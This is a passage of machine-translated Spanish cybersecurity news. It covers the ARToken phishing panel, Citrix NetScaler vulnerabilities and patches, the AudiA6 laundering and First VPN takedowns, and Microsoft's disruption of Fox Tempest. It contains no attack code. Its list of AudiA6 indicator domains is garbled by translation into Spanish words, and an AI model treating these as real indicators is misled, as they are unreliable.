En los dispositivos administrados, se pueden aplicar las mismas opciones de forma centralizada: bloquear la descarga y marcar las aplicaciones que solicitan Accesibilidad o la función de SMS predeterminada.

Los investigadores también han publicado indicadores de compromiso para los equipos que quieren buscarlo. Debido a que el kit se puede cambiar y sus objetivos superpuestos se pueden intercambiar desde un panel, el mismo código puede seguir apareciendo con nuevos nombres, por lo que los nombres de las aplicaciones son una mala manera de rastrearlo. El comportamiento es la señal, no el nombre.

Este kit de phishing se parece más a BEC como servicio

Los kits de herramientas para llevar a cabo campañas de phishing son un instrumento ahora venerable para los ciberdelincuentes, pero los investigadores recientemente encontraron detalles sobre algo así como una plataforma completa de «compromiso de correo electrónico empresarial como servicio».

Cisco Talos dijo el miércoles que había encontrado un panel de operador denominado ARToken, que comparte infraestructura y otras cosas en común con, y como afiliado, la operación de phishing como servicio de EvilTokens creada para evitar la autenticación multifactor y comprometer las cuentas de Microsoft 365. Según se informa, EvilTokens ha experimentado un aumento dramático en sus ataques de phishing (un 1.380 % a principios de este año en comparación con el mismo período del año pasado) con la ayuda de la integración de la inteligencia artificial.

ARToken se destaca, sin embargo, por las capacidades que van más allá de lo que las empresas han hecho público sobre EvilTokens hasta ahora. como Sekoia y microsoft en sí, como la manipulación de reglas de la bandeja de entrada y enlaces de acceso compartido.

«Estas características indican que la plataforma es más madura que un simple kit de phishing de código de dispositivo: es un entorno de operaciones BEC completo», escribió Michael Kelley, ingeniero de investigación de seguridad de Cisco Talos, en un publicación de blogen referencia a estafas de compromiso de correo electrónico empresarial que implican el envío de correos electrónicos falsos para solicitar pagos fraudulentos.

Kelley le dijo a CyberScoop que «hemos visto algunas ofertas que abordan esta capacidad, pero definitivamente parece más desarrollada y pulida que instancias anteriores».

ARToken también se destaca por sus capacidades evasivas, con un sistema antianálisis de siete capas, afirma la publicación.

La investigación proporciona más detalles sobre cómo se ven en la práctica los verdaderos señuelos de phishing de ARToken. Son objetivos específicos, en lugar de dispersos y oportunistas, como lo demuestra un señuelo que la empresa examinada.

«Los mensajes falsifican un contacto de cuentas por pagar en un contratista legítimo de Wisconsin, dirigido a un destinatario de cuentas por pagar en una empresa de ciencias biológicas de EE. UU., abusando de una relación real con un proveedor en lugar de inventar un remitente», escribió Kelley. «El tema atractivo es una consulta sobre facturas pendientes ('las siguientes facturas parecen todavía estar pendientes… indique cuándo se procesarán'), el tipo de mensaje sobre el que el personal de cuentas por pagar está condicionado a actuar».

Kelley le dijo a CyberScoop que Cisco Talos aún no tiene una idea completa de la amplitud de la actividad ni de quién está haciendo uso de la capacidad.

«Hemos visto al sector público como objetivo, pero es poco probable que sea el único», afirmó.

Tim Starks

Escrito por Tim Starks

Tim Starks es reportero senior de CyberScoop. Sus paradas anteriores incluyen trabajar en The Washington Post, POLITICO y Congressional Quarterly. Originario de Evansville, Indiana, se ocupa de la ciberseguridad desde 2003. Envíe un correo electrónico a Tim aquí: tim.starks@cyberscoop.com.

Citrix parchea seis fallas de NetScaler que permiten la lectura de archivos y la denegación de servicio – CYBERDEFENSA.MX

Citrix el martes liberado actualizaciones de seguridad para abordar múltiples fallas en NetScaler ADC (anteriormente Citrix ADC) y NetScaler Gateway (anteriormente Citrix Gateway) que podrían ser explotadas por un atacante para facilitar lecturas arbitrarias de archivos o desencadenar una condición de denegación de servicio (DoS).

Las vulnerabilidades se enumeran a continuación:

  • CVE-2026-8451 (Puntuación CVSS: 8,8): una vulnerabilidad de validación de entrada insuficiente que provoca una sobrelectura de la memoria cuando NetScaler ADC o NetScaler Gateway están configurados como un IDP de SAML.
  • CVE-2026-8452 (Puntuación CVSS: 8,8): una vulnerabilidad de desbordamiento de memoria que provoca un comportamiento impredecible o erróneo y una denegación de servicio cuando el dispositivo está configurado como puerta de enlace o servidor virtual AAA.
  • CVE-2026-8655 (Puntuación CVSS: 8,8): múltiples vulnerabilidades de desbordamiento de memoria que provocan un comportamiento impredecible o erróneo y denegación de servicio cuando NetScaler ADC está configurado como un LB de tipo Oracle, un proxy DNS o una implementación de resolución recursiva de DNS.
  • CVE-2026-10816 (Puntuación CVSS: 7,7): un control externo del nombre del archivo de la vulnerabilidad de la ruta que conduce a una lectura de archivos arbitraria y no autenticada cuando el acceso a NSIP, IP de administración de clústeres o SNIP con acceso de administración está habilitado
  • CVE-2026-10817 (Puntuación CVSS: 6,9): una vulnerabilidad de validación de entrada insuficiente que provoca una sobrelectura de la memoria cuando TCP TimeStamp está habilitado en el perfil TCP y asociado con el servidor virtual (de tipo LB, CS, VPN) o el servicio configurado en NetScaler.
  • CVE-2026-13474 (Puntuación CVSS: 8,7): falta de liberación de memoria después de una vulnerabilidad de por vida efectiva que conduce a una denegación de servicio a través de solicitudes HTTP/2 con formato incorrecto cuando HTTP/2 está habilitado en el perfil HTTP y asociado con el servidor virtual (de tipo LB, CS, VPN) o el servicio configurado en NetScaler.
Ciberseguridad

Se han publicado parches para los defectos de seguridad en las siguientes versiones:

  • NetScaler ADC y NetScaler Gateway 14.1-72.61 y versiones posteriores
  • NetScaler ADC y NetScaler Gateway 13.1-63.18 y versiones posteriores de 13.1
  • NetScaler ADC 14.1-FIPS 14.1-72.61 FIPS y versiones posteriores de 14.1-FIPS
  • NetScaler ADC 13.1-FIPS y 13.1-NDcPP 13.1.37.272 y versiones posteriores de 13.1-FIPS y 13.1-NDcPP

En cuanto a CVE-2026-13474, también se recomienda a los clientes que actualicen sus configuraciones modificando el parámetro Http2SmallWndTimeout, que controla el tiempo de espera (en segundos) para transmisiones detenidas en ventanas pequeñas de HTTP/2.

  • Para dispositivos que utilizan perfiles HTTP estrictos, este parámetro tiene un valor predeterminado de 30 segundos. La solución entra en vigor inmediatamente después de la actualización.
  • Para los dispositivos que NO utilizan perfiles HTTP estrictos, el valor predeterminado es 0. En este caso, simplemente actualizar a las compilaciones que contienen la solución no solucionará la vulnerabilidad por completo. Los clientes deben configurar manualmente Http2SmallWndTimeout en 30 segundos.

El comando para configurar este parámetro se encuentra a continuación:

set ns httpProfile  -http2SmallWndTimeout 

Cisco le dio crédito a Michael Tucker del equipo XOR en JPMorgan Chase, a Aliz Hammond de watchTowr y a Maxim Suhanov por informar sobre las vulnerabilidades. No hay evidencia de que los problemas hayan sido explotados en la naturaleza.

watchTowr Labs, en un artículo técnico publicado junto con el boletín de Citrix, dijo que CVE-2026-8451 fue descubierto e informado a finales de marzo de 2026 después de intentos de reproducirlo. CVE-2026-3055 (puntuación CVSS: 9,3), una falla separada de validación de entrada insuficiente que se reveló a principios de este año.

Ciberseguridad

La compañía de ciberseguridad dijo que la vulnerabilidad se debe a cómo NetScaler analiza las solicitudes de autenticación SAML y comparte la misma causa raíz que la falla de marzo de 2026, lo que resulta en lecturas de memoria fuera de los límites al enviar solicitudes SAML con formato incorrecto.

«Una cosa queremos señalar: a diferencia del CVE-2026-3055 original, en el que se pueden filtrar kilobytes de datos binarios, esta sobrelectura finalizará la lectura fuera de límites cuando se lean varios caracteres de control, como NULL (o incluso >)», afirma el investigador de seguridad Hammond. dicho. «En la práctica, descubrimos que al variar la longitud de la solicitud, podíamos extraer constantemente algunos bytes del servidor».

«Sin embargo, lo que debería ser motivo de preocupación es el panorama más amplio: la tendencia, que sugiere muy claramente que la gestión de la memoria sigue pareciendo frágil dentro de los dispositivos Citrix NetScaler, hasta el punto de que incluso una mala configuración accidental de un dispositivo puede llevar a la revelación de memoria perdida».

En los últimos años, los dispositivos Citrix han sido un objetivo de ataque lucrativo, con múltiples fallas en su software explotadas por actores de amenazas para la implementación de ransomware en el pasado, lo que hace crucial que los usuarios apliquen los parches para una protección óptima.

Europol interrumpe el servicio de lavado de criptomonedas AudiA6 utilizado por bandas de ransomware – CYBERDEFENSA.MX

Las autoridades en Europa han interrumpido AudiA6un servicio de lavado de criptomonedas utilizado por bandas de ransomware y redes de ciberdelincuentes.

Europol, en un comunicado emitido el jueves, dijo que el desmantelamiento del AudiA6 cortó un «canal financiero clave utilizado para lavar cientos de millones en ganancias ilícitas». Se estima que el servicio se ha utilizado para blanquear más de 336 millones de euros (~389 millones de dólares) desde su lanzamiento en 2021.

«La plataforma se convirtió en un centro central para los actores de ransomware y ciberdelincuentes que buscaban retirar activos digitales robados mientras ocultaban el rastro del dinero a las autoridades», dijo la agencia. agregado.

Se sospecha que los operadores de AudiA6 también administraron un foro de cibercrimen en la web oscura conocido como Dark2Web, donde los ciberdelincuentes anunciaban servicios ilícitos y se conectaban con otros actores de amenazas en todo el mundo.

Como parte del operativo que tuvo lugar el 10 de junio de 2026, se llevaron a cabo una serie de acciones coordinadas, entre ellas:

  • Detención de dos presuntos administradores de nacionalidad ucraniana y rusa en Georgia
  • Tres búsquedas de propiedades
  • Eliminación de 25 dominios e incautación de más de 30 servidores
  • Incautación de más de 80 vehículos y múltiples propiedades en Georgia
  • Congelación de activos de criptomonedas por valor de 692.000 euros (798.000 dólares) e incautación de 86.000 euros (99.400 dólares) en criptomonedas
  • Bloquear cuentas de Telegram utilizadas por la red
  • Reemplazo de los sitios web de la web clara y la web oscura de AudiA6 y Dark2Web con un cartel de incautación policial

Al mismo tiempo, el Departamento de Justicia de Estados Unidos (DoJ) anunció cargos contra los dos individuos arrestados, Ruslan Igorevich Tkachuk, de 37 años, y Alexander Vladimirovich Ledenev, de 25, acusándolos de un cargo de conspiración para lavar instrumentos monetarios y un cargo de lavado de dinero encubierto. De ser declarados culpables, ambos se enfrentan a una pena máxima posible de 20 años de prisión.

«De los aproximadamente 10.333 bitcoins depositados, aproximadamente 393,39 BTC (valorados en alrededor de 19.234.331 dólares en el momento de las transacciones) se recibieron directamente de conocidos mercados de la red oscura, organizaciones de ransomware, servicios de cibercrimen y otras fuentes ilícitas, mientras que se depositaron fondos adicionales indirectamente de fuentes ilícitas en carteras AudiA6», dijo el Departamento de Justicia. dicho.

Ciberseguridad

Europol dijo que la represión fue el resultado de una acción coercitiva anterior llevada a cabo por la policía polaca que condujo al arresto de un ciudadano ucraniano en septiembre de 2025 por su presunta participación en actividades de lavado de dinero relacionadas con el grupo AudiA6.

Esto permitió a las autoridades iniciar un examen forense de los dispositivos electrónicos incautados pertenecientes al sospechoso e identificar a personas adicionales vinculadas a la operación.

AudiA6 ha sido descrita como una operación de lavado de criptomonedas a escala industrial que se basó en miles de cuentas de intercambio fraudulentas abiertas utilizando identidades robadas o compradas. El servicio criminal ha sido vinculado a más de 15 investigaciones en todo el mundo relacionadas con ataques de ransomware y robo de criptomonedas a gran escala.

Antes de su disrupción, AudiA6 se comercializaba como un servicio de mezcla de criptomonedas que garantizaba anonimato y velocidad. Permitía a los clientes transferir sus ganancias obtenidas ilícitamente a billeteras controladas por el grupo y recibían a cambio fondos «limpios» en una hora a través de una «compleja cadena de transacciones» diseñada para ocultar el origen de los fondos.

Estas transacciones se realizaron a través de plataformas de mensajería privadas, y los operadores cobraban comisiones que oscilaban entre el 3 y el 10 por ciento.

«Durante la investigación se identificaron más de 6.000 registros de Conozca a su Cliente (KYC) vinculados a cuentas de mulas de dinero», dijo Europol. «Muchas de las cuentas de las mulas estaban conectadas a intermediarios de habla rusa reclutados específicamente para ayudar a mover ganancias criminales a través de intercambios de criptomonedas».

También se dice que AudiA6 dependió tanto de proveedores de correo electrónico comerciales como de direcciones de correo electrónico vinculadas a dominios bajo su control para registrar cuentas de mulas de dinero en varios intercambios de criptomonedas. Los nombres de los dominios se enumeran a continuación:

  • designli.fotos
  • pheontx.eu
  • smplfy.in
  • sumato-soft.org
  • technobrains.dev
  • lett.correo electrónico
  • trayo.aplicación
  • entregando.arriba
  • bandeja de entrada.arriba
  • postfast.eu
  • postino.hacer clic
  • agenciainboxally.agency
  • mailora.eu
  • postify.correo electrónico
  • quix.express
  • flowcomm.hacer clic
  • qube.negro
  • entregarlett.com
  • cartacorreo.eu

En un informe publicado en noviembre de 2021, Intel 471 reveló que AudiA6 requería un saldo mínimo de 27 bitcoins y que cobraba una tarifa fija de servicio de entre el 3 y el 5,5 por ciento. En diciembre de 2025, un análisis de TRM Labs encontró que los fondos robados del hack de LastPass de 2022 se enrutaron a través de Cryptex y AudiA6.

Ciberseguridad

La investigación fue llevada a cabo por el Servicio Secreto de los Estados Unidos y la Investigación Criminal del IRS, junto con la policía polaca y socios encargados de hacer cumplir la ley de Australia, Canadá, Francia, Georgia, Alemania, Islandia, Japón, Suiza y el Reino Unido.

Los hallazgos ilustran el aumento de los servicios de lavado de criptomonedas a escala industrial que permiten la economía del cibercrimen, así como el uso de cuentas de cambio fraudulentas, billeteras mula y herramientas centradas en la privacidad diseñadas para encubrir el rastro del dinero y eludir los controles contra el lavado de dinero.

«Los grupos de ransomware y las redes cibercriminales dependen cada vez más de intercambios descentralizados y plataformas de ‘mezclador como servicio’ para mover criptomonedas ilícitas a través de múltiples cadenas de bloques en cuestión de minutos, ayudando a que las ganancias criminales desaparezcan en el subsuelo digital», dijo Europol.

Las autoridades europeas desmantelan un prolífico servicio VPN contra delitos cibernéticos

Las autoridades europeas derribaron un destacado servicio de red privada virtual y arrestó al presunto administrador detrás de una operación que los ciberdelincuentes utilizaban para robar datos, cometer fraudes y ataques de ransomware, dijo el jueves Europol.

La primera VPN, que se promocionó en foros de cibercrimen de habla rusa, ganó popularidad por brindar servicios que permitían a los usuarios ocultar su infraestructura e identidades. Los funcionarios dijeron que el servicio estaba arraigado en el mundo del cibercrimen y apareció en casi todas las investigaciones recientes importantes sobre delitos cibernéticos con la ayuda de Europol.

«Durante años, los ciberdelincuentes vieron este servicio VPN como una puerta de entrada al anonimato», dijo en un comunicado Edvardas Šileris, jefe del Centro Europeo de Ciberdelincuencia de Europol.

«Creían que eso los mantendría fuera del alcance de las fuerzas del orden», añadió Šileris. «Esta operación demuestra que están equivocados. Desconectarla elimina una capa crítica de protección de la que dependían los delincuentes para operar, comunicarse y evadir la aplicación de la ley».

La operación se extendió durante dos días a principios de esta semana, encabezada por Francia y los Países Bajos, con el apoyo de Europol, Eurojust y ocho países más.

Las autoridades dijeron que arrestaron al presunto administrador y registraron su residencia en Ucrania, pero se negaron a nombrar a la persona. Los funcionarios también desmantelaron 33 servidores vinculados al servicio y confiscaron múltiples dominios, incluidos 1vpns.com, 1vpns.net y 1vpns.org.

Los investigadores obtuvieron la base de datos de usuarios de First VPN e identificaron conexiones VPN utilizadas por presuntos ciberdelincuentes. La inteligencia recopilada durante la operación descubrió miles de usuarios vinculados al delito cibernético y formó pistas adicionales relacionadas con ataques de ransomware y esquemas de fraude, dijeron los funcionarios.

Europol dijo que los usuarios de First VPN fueron notificados del cierre y advirtieron que las autoridades ahora conocen sus identidades.

Las autoridades francesas y holandesas comenzaron a investigar seriamente a First VPN en noviembre de 2023 y compartieron evidencia con 16 países para coordinar el análisis de datos y respaldar otras investigaciones en curso. Los funcionarios de múltiples jurisdicciones están utilizando la inteligencia recopilada durante la operación para ayudar en 21 investigaciones adicionales a nivel mundial.

Matt Kapko

Escrito por Matt Kapko

Matt Kapko es reportero de CyberScoop. Su ámbito incluye delitos cibernéticos, ransomware, defectos de software y (mala) gestión de vulnerabilidades. El californiano de toda la vida comenzó su carrera periodística en 2001 con paradas anteriores en Cybersecurity Dive, CIO, SDxCentral y RCR Wireless News. Matt tiene una licenciatura en periodismo e historia de la Universidad Estatal de Humboldt.

Microsoft elimina el servicio de firma de malware detrás de los ataques de ransomware – CYBERDEFENSA.MX

Microsoft dijo el martes que interrumpió una operación de firma de malware como servicio (MSaaS) que utilizó como arma el sistema Artifact Signing de la compañía para entregar código malicioso y realizar ransomware y otros ataques, comprometiendo miles de máquinas y redes en todo el mundo.

El gigante tecnológico atribuyó la actividad a un actor de amenazas al que llama Tempestad de zorrosque según dijo ofrecía el esquema MSaaS para permitir a los ciberdelincuentes disfrazar malware como software legítimo. El actor de amenazas ha estado activo desde mayo de 2025. El esfuerzo de incautación lleva el nombre en código OpFauxSign.

«Para interrumpir el servicio, nos apoderamos del espacio de señalización del sitio web de Fox Tempest.[.]nube, desconectó cientos de máquinas virtuales que ejecutaban la operación y bloqueó el acceso a un sitio que aloja el código subyacente», dijo Steven Masada, asesor general adjunto de la Unidad de Delitos Digitales de Microsoft, dicho.

Microsoft señaló que la operación permitió la implementación del ransomware Rhysida por parte de actores de amenazas como Vanilla Tempest, junto con otras familias de malware como Oyster, Lumma Stealer y Vidar, lo que ilustra el papel crucial desempeñado por Fox Tempest dentro del ecosistema del cibercrimen.

Ciberseguridad

Además, se han descubierto conexiones entre el actor de amenazas y los afiliados asociados con varias cepas de ransomware destacadas, incluidas INC, Qilin, BlackByte y Akira. Los ataques organizados por estas operaciones se han dirigido a servicios de salud, educación, gobierno y financieros ubicados en Estados Unidos, Francia, India y China.

Firma de artefactos (anteriormente Azure Trusted Signing) es la solución de firma de extremo a extremo totalmente administrada de Microsoft que permite a los desarrolladores crear y distribuir aplicaciones fácilmente, al tiempo que garantiza que el software sea legítimo y no haya sido modificado por partes no autorizadas.

Se dice que Fox Tempest aprovechó este mecanismo para generar certificados de firma de código fraudulentos de corta duración y utilizarlos para entregar malware firmado y confiable y eludir los controles de seguridad. Los certificados tenían una validez de sólo 72 horas.

«Para obtener certificados firmados legítimos a través de la firma de artefactos, el solicitante debe pasar procesos detallados de validación de identidad de acuerdo con las credenciales verificables (VC) estándar de la industria, lo que sugiere que el actor de amenazas muy probablemente utilizó identidades robadas con base en los Estados Unidos y Canadá para hacerse pasar por una entidad legítima y obtener las credenciales digitales necesarias para firmar», Microsoft explicado.

«El sitio web de SignSpace se creó sobre la firma de artefactos y permitió la firma segura de archivos a través de un panel de administración y una página de usuario, aprovechando las suscripciones de Azure, los certificados y una base de datos estructurada para administrar usuarios y archivos».

El servicio permitía a los clientes cibercriminales pagar subir archivos maliciosos para firmar códigos utilizando certificados obtenidos de manera fraudulenta por Fox Tempest. Esto, a su vez, permitió que el malware y el ransomware se hicieran pasar por software legítimo como AnyDesk, Microsoft Teams, PuTTY y Cisco Webex. El servicio cuesta entre $5.000 y $9.000.

A partir de febrero de 2026, se dice que el actor de amenazas pasó a proporcionar a los clientes máquinas virtuales (VM) preconfiguradas alojadas en Cloudzy, lo que permite cargar directamente los artefactos necesarios a la infraestructura controlada por el atacante y recibir archivos binarios firmados a cambio.

Ciberseguridad

«Esta evolución de la infraestructura redujo la fricción para los clientes, mejoró la seguridad operativa de Fox Tempest y simplificó aún más la entrega de malware firmado, malicioso pero confiable a escala», dijo Microsoft.

Se ha descubierto que los actores de amenazas como Vanilla Tempest distribuyen archivos binarios firmados a través del servicio a través de anuncios comprados legítimamente que redirigen a los usuarios que buscan Microsoft Teams a páginas de descarga falsas, allanando el camino para la implementación de Oyster (también conocido como Broomstick o CleanUpLoader), un implante y cargador modular responsable de entregar el ransomware Rhysida.

Microsoft dijo que Fox Tempest ha adaptado continuamente su oficio a medida que la compañía implementó contramedidas, como deshabilitar cuentas fraudulentas y revocar los certificados obtenidos ilícitamente, y el actor de amenazas incluso intentó cambiar a un servicio de firma de código diferente. Los documentos judiciales revelan que Microsoft trabajó con una «fuente cooperativa» para comprar y probar el servicio entre febrero y marzo de 2026.

«Cuando los atacantes pueden hacer que el software malicioso parezca legítimo, socava la forma en que las personas y los sistemas deciden qué es seguro», dijo Redmond. «Interrumpir esa capacidad es clave para aumentar el costo del cibercrimen».

Microsoft interrumpe el servicio de cibercrimen que abusaba en masa de los sistemas de verificación de software

Microsoft se apoderó de la infraestructura e interrumpió un servicio de ciberdelincuencia que creaba y vendía más de 1.000 certificados de firma de código que otros ciberdelincuentes utilizaban para hacer que el software plagado de malware pareciera confiable y legítimo para posteriores ciberataques, incluido el ransomware, dijo la compañía el martes.

El grupo de amenazas con motivación financiera, que Microsoft rastrea como Fox Tempest, proporcionó la firma de malware como servicio a múltiples grupos de ransomware, incluidos Rhysida, Vanilla Tempest, Storm-0501, Storm-2561 y Storm-0249 durante al menos un año antes de que Microsoft recibiera una orden judicial para desmantelar la operación.

Fox Tempest, que Microsoft ha estado rastreando desde septiembre de 2025, abusó del sistema de firma de artefactos de Microsoft al fabricar identidades y hacerse pasar por organizaciones legítimas para acceder a los servicios de firma de códigos de Microsoft, dijo Steven Masada, asesor general adjunto de la Unidad de Delitos Digitales de Microsoft, durante una conferencia de prensa el lunes.

Los ciberdelincuentes pagaron a Fox Tempest hasta 9.500 dólares para firmar su código malicioso, lo que les permitió pasar el software a través de las defensas y eludir los controles diseñados para confirmar que los programas son auténticos y están vinculados a una fuente confiable.

«Esta no es la imitación obvia que se puede encontrar en una esquina. Es más bien un producto falsificado que es tan preciso que incluso los expertos tienen problemas para distinguirlo del producto real», dijo Masada. «Actúa como una identificación falsa que permite a los ciberdelincuentes ingresar a los sistemas simplemente cruzando la puerta principal».

Si bien los atacantes y defensores históricamente se han centrado en los puntos de entrada de los ataques, la operación de Fox Tempest ejemplifica un movimiento más amplio en relación con la forma en que se construyen los ataques en primer lugar, añadió.

«Ya no se trata sólo de engañar a los usuarios para que hagan clic en un enlace, sino de explotar los mismos sistemas en los que confiamos para decidir qué es seguro y qué no», dijo Masada.

Los ciberdelincuentes han estado revendiendo certificados de firma de código durante al menos una década, pero la operación de Fox Tempest fue única al proporcionar un servicio masivamente escalable para extorsión, phishing, envenenamiento de SEO o publicidad con malware, dijo Maurice Mason, quien dirigió la investigación sobre Fox Tempest como investigador principal de delitos cibernéticos en la DCU de Microsoft.

Mason dijo que los operadores de ransomware y otros grupos de amenazas implementaron principalmente estos certificados fraudulentos en anuncios o envenenamiento de SEO, lo que llevó a su software malicioso y a sus ladrones de información a la cima de las clasificaciones de búsqueda, atrapando a víctimas desprevenidas que pensaban que estaban descargando y ejecutando aplicaciones legítimas.

La operación de Fox Tempest, que incluía un portal autenticado y una función de arrastrar y soltar que permitía a los clientes firmar su código, estaba directamente relacionada con la implementación de docenas de familias de malware, incluidas Oyster, Lumma Stealer, MuddyWater y Vidar, añadió.

Microsoft dijo que el grupo de amenazas también está vinculado a afiliados de ransomware de INC, Qilin, Akira y otros. La operación tuvo un impacto global, lo que resultó en ataques a los sectores de salud, educación, gobierno y servicios financieros, y a organizaciones y personas más atacadas en los Estados Unidos, Francia, India y China.

«¿Por qué no pagarías esos miles de dólares si eres un actor de amenazas y los recuperas mediante extorsión y ransomware por valor de millones? Esto es como una calderilla para ti», dijo Mason.

Microsoft dijo que desalojó o eliminó más de 1.000 cuentas y suscripciones que Fox Tempest usaba para brindar sus servicios. La compañía también se apoderó del sitio web del grupo de amenazas, desconectó cientos de máquinas virtuales y bloqueó el acceso a un sitio que aloja el código subyacente.

«Esta interrupción probablemente aumentará el costo para los atacantes, y esperamos que dejen de utilizar estos servicios», dijo Mason. «Obviamente es sólo una interrupción y hay otras cosas a las que probablemente se trasladarán, o alguien podría intentar hacer esto de otra manera la próxima vez».

Fox Tempest es un ejemplo de la economía plenamente desarrollada del cibercrimen que enfrentan ahora los defensores, dijo Masada.

«En muchos casos, un actor ya no necesita crear un ataque desde cero. Simplemente puede ensamblar uno comprando sus componentes: un kit de phishing de un proveedor, malware de otro, infraestructura y herramientas de optimización de otros, y así sucesivamente», afirmó.

«A medida que centramos más nuestras recientes perturbaciones en los mercados y los proveedores de servicios, obtenemos una imagen mucho más clara de cómo funciona realmente la economía, y lo que está surgiendo es un ecosistema estratificado», añadió Masada.

«Por un lado, están las herramientas mercantilizadas que se producen en masa y se construyen a escala, como kits de phishing llave en mano o servicios de recolección de credenciales», dijo. «Pero por encima de eso, estamos viendo un nivel más sofisticado de operadores, servicios altamente especializados centrados en la evasión, la durabilidad y la optimización. Estos no sólo permiten ataques, sino que los diseñan para que tengan éxito contra las defensas modernas».

Matt Kapko

Escrito por Matt Kapko

Matt Kapko es reportero de CyberScoop. Su ámbito incluye delitos cibernéticos, ransomware, defectos de software y (mala) gestión de vulnerabilidades. El californiano de toda la vida comenzó su carrera periodística en 2001 con paradas anteriores en Cybersecurity Dive, CIO, SDxCentral y RCR Wireless News. Matt tiene una licenciatura en periodismo e historia de la Universidad Estatal de Humboldt.